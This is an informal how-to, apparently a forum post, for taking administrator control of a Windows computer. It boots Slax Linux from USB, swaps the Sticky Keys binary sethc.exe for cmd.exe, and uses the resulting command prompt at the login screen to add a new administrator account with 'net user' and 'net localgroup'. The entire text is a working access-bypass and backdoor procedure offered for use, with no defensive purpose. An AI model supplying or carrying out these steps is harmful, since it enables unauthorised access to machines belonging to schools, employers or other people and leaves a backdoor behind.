1) Get Slax: Slax: get slax
download the one for USB, put all the files in the download into an empty (to prevent issues) USB
2) Keep the USB in the computer
3) Reboot the computer, press F12 (or whatever it says to change boot order or something like that)
4) Choose the Load from USB option
5) Choose "Graphical"
6) when slax loads up, open konsole (linux equivalent of command prompt, second icon in the bottom right)
7) type "cd /mnt"
8) type "ls", look for something with letters and a number at the end (usually hda1, or sda1), if there's more than one, type "cd " and the folder name for each one and type "ls" again, if it has a folder called "WINDOWS" (look carefully because it's sometimes hard to find), you're in the right folder, if not, type "cd ../" and try a different folder
9) next, type "cd ./WINDOWS/system32" (take note of the case of the letters, anything capital must be capital otherwise it won't move to the folder)
10) type "mv sethc.exe sethc2.exe"
11) type "cp cmd.exe sethc.exe"
12) restart your computer, hit shift a bunch of times (command prompt should come up, if it doesn't, hold shift, the goal is to activate sticky keys)
13) type this into cmd:
and replace [username] and [password] with ur username and password
net user /add [username] [password]
net localgroup administrators [username] /add
14) log into [username]
15) enjoy yo adminz